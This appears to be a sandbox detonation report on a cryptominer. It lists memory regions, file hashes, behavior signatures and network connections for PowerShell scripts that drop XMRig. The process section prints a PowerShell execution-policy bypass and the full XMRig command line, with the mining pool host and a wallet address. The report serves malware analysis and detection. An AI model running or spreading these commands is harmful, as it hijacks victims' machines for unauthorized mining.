memory/2460-0-0x00007FF99C6E3000-0x00007FF99C6E5000-memory.dmp
memory/2460-10-0x000002849C3C0000-0x000002849C3E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h5ticl0.fb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2460-11-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-12-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-14-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-15-0x000002849C450000-0x000002849C462000-memory.dmp
memory/2460-16-0x000002849C430000-0x000002849C43A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2660-47-0x000002493DC80000-0x000002493DCA0000-memory.dmp
memory/2660-48-0x000002493DCC0000-0x000002493DCE0000-memory.dmp
memory/2660-49-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-52-0x000002493F5B0000-0x000002493F5D0000-memory.dmp
memory/2660-51-0x000002493F590000-0x000002493F5B0000-memory.dmp
memory/2660-50-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2460-53-0x00007FF99C6E3000-0x00007FF99C6E5000-memory.dmp
memory/2460-54-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2660-55-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-56-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-57-0x000002493F590000-0x000002493F5B0000-memory.dmp
memory/2660-58-0x000002493F5B0000-0x000002493F5D0000-memory.dmp
memory/2660-59-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-60-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-61-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-62-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-63-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-64-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-65-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-66-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-67-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-68-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-69-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-70-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-71-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-72-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-73-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-74-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-75-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-76-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-77-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-78-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-79-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-80-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-81-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-82-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-83-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-84-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-85-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-86-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-87-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-88-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-89-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-90-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-91-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-92-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-93-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-94-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-95-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-96-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-97-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-98-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-99-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-100-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-101-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-102-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-103-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-104-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-105-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-106-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-107-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-108-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-109-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-110-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-111-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-112-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-113-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-114-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-115-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-116-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-117-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2124 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2124-0-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp
memory/2124-9-0x000001BB5B480000-0x000001BB5B4A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40oj0wqt.dcj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2124-10-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2124-11-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2124-12-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2124-14-0x000001BB5B730000-0x000001BB5B742000-memory.dmp
memory/2124-15-0x000001BB5B720000-0x000001BB5B72A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2192-46-0x000001E1AEE30000-0x000001E1AEE50000-memory.dmp
memory/2192-47-0x000001E1AEE70000-0x000001E1AEE90000-memory.dmp
memory/2192-48-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2124-49-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp
memory/2124-50-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2192-51-0x000001E241820000-0x000001E241840000-memory.dmp
memory/2192-52-0x000001E241A50000-0x000001E241A70000-memory.dmp
memory/2192-53-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2124-54-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2124-55-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp
memory/2192-56-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-57-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-59-0x000001E241A50000-0x000001E241A70000-memory.dmp
memory/2192-58-0x000001E241820000-0x000001E241840000-memory.dmp
memory/2192-60-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-61-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-62-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-63-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-64-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-65-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-66-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-67-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-68-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-69-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-70-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-71-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-72-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-73-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-74-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-75-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-76-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-77-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-78-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-79-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-80-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-81-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-82-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-83-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-84-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-85-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-86-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-87-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-88-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-89-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-90-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-91-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-92-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-93-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-94-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-95-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-96-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-97-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-98-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-99-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-100-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-101-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-102-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-103-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-104-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-105-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-106-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-107-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-108-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-109-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-110-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-111-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-112-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-113-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-114-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-115-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-116-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-117-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
memory/2192-118-0x00007FF708E90000-0x00007FF709AC3000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2940 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2940 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/2940-2-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp
memory/2940-5-0x0000025157E80000-0x0000025157EA2000-memory.dmp
memory/2940-7-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2940-9-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2940-10-0x0000025158030000-0x00000251580A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04ehuu2p.ykl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2940-25-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2940-48-0x00000251581B0000-0x00000251581C2000-memory.dmp
memory/2940-61-0x0000025158010000-0x000002515801A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4740-90-0x000001F2C7710000-0x000001F2C7730000-memory.dmp
memory/2940-91-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp
memory/2940-92-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/4740-93-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/2940-94-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/4740-95-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-96-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-97-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-98-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-99-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-100-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-101-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-102-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-103-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-104-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-105-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-106-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-107-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-108-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-109-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-110-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-111-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-112-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-113-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-114-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-115-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-116-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-117-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-118-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-119-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-120-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-121-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-122-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-123-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-124-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-125-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-126-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-127-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
